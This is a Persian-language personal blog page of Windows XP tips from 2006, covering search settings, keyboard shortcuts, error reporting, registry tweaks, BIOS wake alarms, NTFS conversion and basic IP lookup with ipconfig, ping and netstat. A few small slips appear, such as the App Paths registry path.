اگر شما هم به شكل سرراست و ساده‌ي پنجره‌ي جستجو در  نسخه‌هاي قديمي‌ عادت داريد و نمي‌خواهيد با ديدن انيميشن‌هاي WinXP وقت خود را تلف كنيد در پنجره‌ي Search ، گزينه‌ي Change preferences و سپس گزينه‌ي Without an animated screen character را انتخاب كنيد. حال دوباره به Change Preferences برويد، سپس Change files and folders search behavior و سپس Advanced و در پايان Ok را كليك كنيد. حال جستجو براي فايل‌ها خيلي راحت، سرراست و سريع خواهد بود.


 

+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 12:34  توسط مهدی اردیانی  | 

در حالي که کليد Numlock روشن است روي آيکوني که ميخواهيم اسم نداشته باشد کليک راست ميکنيم و Rename را انتخاب ميکنيم و در حاليکه کليد Alt را فشار دادهايم عدد 0160 و يا 255را تايپ ميکنيم.

+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 6:4  توسط مهدی اردیانی  | 

 وقتي تو ويندوز Xp يه برنامه هنگ ميکنه يه پنجره باز ميشه که يه دکمه به اسم DON'T SEND داره  براي از بين بردن اين پيغام :
1- روي My Computer راست کليک کرده و گزينه Properties رو بزنين.
2- به تب Advanced بريد.
3- يه دکمه بالاي کنسول هست به اسمه Error Reporting اونو بزنين.
4- گزينه Disable Error Reporting رو انتخاب کنين و تيک زير اون رو هم بردارين.
5- همه پنجره ها رو OK کنين.

+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 5:57  توسط مهدی اردیانی  | 

بعضي از کليد هاي ميانبر ويدوز عبارتند از :
windows + r = گزينه Run
windows + e = پنجره Windows explorer
windows + u = پنجره Utility Manager
windows + d = گزينه Shoe Desktop
windows + f = پنجره search
windows + l = سوئيچ کردن بين User ها
windows + m = گزينهMinimize
ctrl+shift+esc = پنجره task manager
alt + space = راست کليک روي title bar
+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 5:51  توسط مهدی اردیانی  | 

اگر از طرفداران استفاده از Windows Media Player هستيد حتما با اين مشكل در اين برنامه برخورد كرده ايد كه Media Player بطور پيش فرض فايل هاي ويديويي DAT را در ليست فايل ها نمايش نمي دهد و بايد براي نمايش و باز كردن آنها از قسمت Files Of Type گزينه All Files (*.* ) را انتخاب كنيم تا همه فايل ها بدون توجه به پسوندي كه دارند نمايش داده شوند.

جهت افزودن اين قابليت به Media Player مراحل زير را انجام دهيد :

1- Regedit را اجرا كنيد .
2- باز شدن برنامه كليد زير را بيابيد :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\Player\Extensions\Descriptions

3- برروي Types كليك كنيد . در پنل سمت راست روي عدد 3 دوبار كليك كنيد تا پنجره Edit string باز شود .
در انتهاي قسمت Value Data ابتدا يك ” Semicolon “ و سپس عبارت *.dat را وارد كنيد.
4- Registry Editor را ببنديد و Media Player را امتحان كنيد

+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 5:45  توسط مهدی اردیانی  | 

روشن کردن کامپيوتر در زمان دلخواه :
 وارد محيط setup شويد.
بعد بدنبال گزينه Power Management Setup بگرديد.
حالا گزينه PWron/Resume by alarm را پيدا كنيد .
گزينه فوق را زا حالت غير فعال به فعال تغيير دهيد .
حالا گزينه date alarm در زير فعال شده و مي توانيد تاريخ خود را ثبت كنيد.
زمان را مي توانيد با گزينه Time alarm ثبت نماييد .
با فشردن كليد F10 و ذخيره اطلاعات و تغييرات كامپيوتر خود را خاموش كنيد و فقط سيم برق كامپيوتر
به پريز باشد حال در تاريخ و تايم مورد نظر شما كامپيوتر بصورت اتوماتيك روشن مي شود.
بعد از اين ،شما مي توانيد به جاي استفاده از ساعت براي بيدار شدن از اين کار استفاده کنيد . البته بايد در Start up ويندوز يک آهنگ بگذاريد و اسپيکر ها هم روشن باشد.
+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 5:42  توسط مهدی اردیانی  | 

1- اجراي دقيق Scan disk : وجود اشکال در فايل هاي ذخيره شده بر روي هارد ديسک ممکن است کاهش کارآئي سيستم و بروز اشکالات فيزيکي هارد ديسک را بدنبال داشته باشد . با اجراي برنامه Scan disk  مي توان تعداد زيادي از خطاهاي موجود بر روي هارد ديسک را برطرف نمود . برنامه فوق بررسي لازم در خصوص وجود اشکالات فيزيکي بر روي هارد ديسک را نيز انجام خواهد داد . بخاطر داشته باشيد که با توجه به ظرفيت هارد ديسک نصب شده بر روي کامپيوتر ، فرآيند بررسي وضعيت هارد ديسک مي تواند مدت زمان زيادي بطول انجامد و نمي بايست در اين فاصله عمليات خاصي را انجام داد .
2- حذف فايل هاي موقت موجود بر روي هارد ديسک : فايل هاي موقت به آندسته از فايل ها اطلاق مي گردد که معمولا" پس از نصب يک برنامه همچنان بر روي هارد ديسک باقي مي مانند و مي توان بدون نگراني اقدام به حذف آنان نمود  .
3- حذف اطلاعات موجود در Cache برنامه مرورگر : فايل هاي cache شده ، به آندسته از فايل هائي اطلاق مي گردد که ...


ادامه مطلب
+ نوشته شده در  پنجشنبه بیست و پنجم اسفند ۱۳۸۴ساعت 7:26  توسط مهدی اردیانی  | 

استفاده از فايل سيستمي ntfs به دليل وجود اطمينان و امنيت  بيشتر مورد توجه کاربران است. چون ويندوز 98 از اين نوع فايل سيستم پشتيباني نمي کند بعضي از کاربران بدليل استفاده از ويندوز 98 از فايل سيستم fat32 يا fat16  استفاده مي کنند. براي کساني که در حال حاضر از فايل سيستم fat32 استفاده مي کنند و مي خواهند آن را به ntfs تغيير دهند و در اصطلاح convert کنند مي توانيد از نرم افزارهاي مختلف مانند partition magic يا system commander استفاده کنيد البته ويندوز xp امکاناتي را براي اين کار قرار داده است. براي اين کار در منوي run فرمان cmd را تايپ کنيد و enter را بزنيد تا اجرا شود. در پنجره باز شده فرمان زير را تايپ کنيد:
convert x:/fs:ntfs
X در حقيقت حرفيه ...


ادامه مطلب
+ نوشته شده در  پنجشنبه بیست و پنجم اسفند ۱۳۸۴ساعت 7:22  توسط مهدی اردیانی  | 


Data Transfer Rate
سرعتي ميباشد که مودم ميتواند اطلاعات را منتقل کند که معمولاً برحسب تعداد بيتها در ثانيه ميباشد . هر قدر رقم مربوطه به سرعت انتقال داده بالاتر باشد سرعت مودم بالاتر خواهد بود

Ethernet
از روشهاي معمول در شبکه هاي کامپيوتري جهت اطلاعات ميباشد و به شما اجازه ميدهد که کامپيوتر ها و ابزارهاي جانبي مثل پرينتر را به هم متصل کند.

Fire Wall
نرم افزاري که جهت جلوگيري از ورود نفوذگران به سيستم هاي متصل به شبکه بکار برده ميشود که ديواره آتش نام دارد. عمدتا ...


ادامه مطلب
+ نوشته شده در  پنجشنبه بیست و پنجم اسفند ۱۳۸۴ساعت 7:21  توسط مهدی اردیانی  | 

شما پس از وصل شدن به اينترنت، وارد Command مي شويد سپس در اونجا IPCONFIG را تايپ كنيد سپس آي پي شما برايتان نمايش داده مي شود.در قسمت IP ADDRESS شماره آي پي خود را خواهيد ديد.
چگونه IP يك سايت را بدست آوريم؟
شما به Command بريد سپس در PING SITE-NAME را بزنيد و بعد آي پي سايت را مي دهد.
 چگونه آي پي يك فرد رو وقتي داره با شما چت مي كند بدست آوريم؟
به قسمت Command بريد سپس در اونجا فرمان Netstat -n رو بزنيد در اين قسمت شما قادر خواهيد بود هر آي پي كه به كامپيوتر شما وصل هست را نمايش مي ده. شما براي اينكه ببينيد چه آي پي هايي به شما وصل هست قسمت Foreign Address را ببينيد.
وقتي به اينترنت وصل شديد و داشتيد با كسي چت مي كرديد در قسمت Foreign Address مي تونيد آدرس آي پي كه به شما وصل هست همراه با اون پورتي كه به شما وصل هست را نمايش مي دهد و در قسمت State هم نشان مي دهد اين ارتباط برقرار هست يا خير.
+ نوشته شده در  پنجشنبه بیست و پنجم اسفند ۱۳۸۴ساعت 7:19  توسط مهدی اردیانی  | 

 

برنامه‌هایی مثل Regedit و Msconfig را می‌توان از طريق كادر محاوره ای Run و بدون نوشتن مسیر آن‌ها اجرا كرد. اما برای اجرای سایر برنامه‌ها، باید یك كلید به رجیستری اضافه كنیم.

مسیر زیر را دنبال كنید:
HKEY-LOCAL-MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ App Paths
حالا یك كلید كه نام آن همان نام فایل اجرایی است، اضافه كنید. برای مثال Myprog.exe . مقدار آن‌را برابر آدرس كامل برنامه قرار دهید، در مثال ما C:\Program Files\Myprog\Myprog.exe . همچنین می‌بایست یك String Value ایجاد كنید كه آدرس آن فقط قسمتی از محل مورد نظر شماست كه در مثال ما این آدرس می‌باشد: C:\Program Files\MyProg

 

+ نوشته شده در  پنجشنبه بیست و پنجم اسفند ۱۳۸۴ساعت 6:21  توسط مهدی اردیانی  |